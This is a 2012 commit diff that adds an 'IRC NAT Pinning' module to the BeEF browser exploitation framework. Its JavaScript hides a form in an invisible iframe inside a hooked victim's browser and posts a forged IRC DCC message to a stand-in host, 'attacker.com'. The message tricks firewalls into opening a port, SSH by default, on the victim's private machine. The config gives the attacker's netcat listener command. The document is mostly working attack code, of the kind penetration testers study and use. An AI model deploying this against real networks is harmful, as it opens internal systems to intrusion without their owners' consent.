Merge pull request #712 from bmantra/master

Fixes #102
2012-06-30 03:08:15 -07:00
parent 9fdd8bc819 3784cc4e37
commit fa569fa3e7
3 changed files with 111 additions and 0 deletions
--- a/modules/network/nat_pinning_irc/command.js
+++ b/modules/network/nat_pinning_irc/command.js
@@ -0,0 +1,54 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var privateip = '<%= @privateip %>';
+  var privateport = '<%= @privateport %>';
+  var connectto = '<%= @connectto %>';
+
+  function dot2dec(dot){
+    var d = dot.split('.');
+    return (((+d[0])*256+(+d[1]))*256+(+d[2]))*256+(+d[3]);
+  }
+    
+  var myIframe = beef.dom.createInvisibleIframe();
+  var myForm = document.createElement("form");
+  var action = connectto + ":6667/"
+ 
+  myForm.setAttribute("name", "data");
+  myForm.setAttribute("method", "post");
+  //it must be multipart/form-data so the message appears on separate line
+  myForm.setAttribute("enctype", "multipart/form-data");
+  myForm.setAttribute("action", action);
+
+    
+  //create message, refer Samy Kamkar (http://samy.pl/natpin/)
+  x = String.fromCharCode(1);
+  var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n";
+
+  //create message textarea
+  var myExt = document.createElement("textarea");
+  myExt.setAttribute("id","msg_<%= @command_id %>");
+  myExt.setAttribute("name","msg_<%= @command_id %>");
+  myForm.appendChild(myExt);
+  myIframe.contentWindow.document.body.appendChild(myForm);
+
+  //send message
+  myIframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = s;
+  myForm.submit(); 
+    
+  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+
+});
--- a/modules/network/nat_pinning_irc/config.yaml
+++ b/modules/network/nat_pinning_irc/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        irc_nat_pinning:
+            enable: true
+            category: "Network"
+            name: "IRC NAT Pinning" 
+            description: "Attempts to open closed ports on statefull firewalls and attempts to create pinholes on NAT-devices.  The firewall/NAT-device must support IRC connection tracking.  On the attackers side the TCP connection just needs to be accepted (nc -l -p 6667).  Then you can connect to the victims public IP on that port.  For the moment it hasn't been tested with NAT, but it works with iptables when ip_conntrack and ip_conntrack_irc are loaded.  For more information, please refer to: <a href='http://samy.pl/natpin/'>http://samy.pl/natpin/</a> ."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["FF"]
--- a/modules/network/nat_pinning_irc/module.rb
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -0,0 +1,32 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Irc_nat_pinning < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>'http://attacker.com'},
+        {'name'=>'privateip', 'ui_label' =>'Private IP','value'=>'192.168.0.100'},
+        {'name'=>'privateport', 'ui_label' =>'Private Port','value'=>'22'}
+    ]
+  end
+  
+  def post_execute
+    return if @datastore['result'].nil?
+    
+    save({'result' => @datastore['result']})
+  end
+  
+end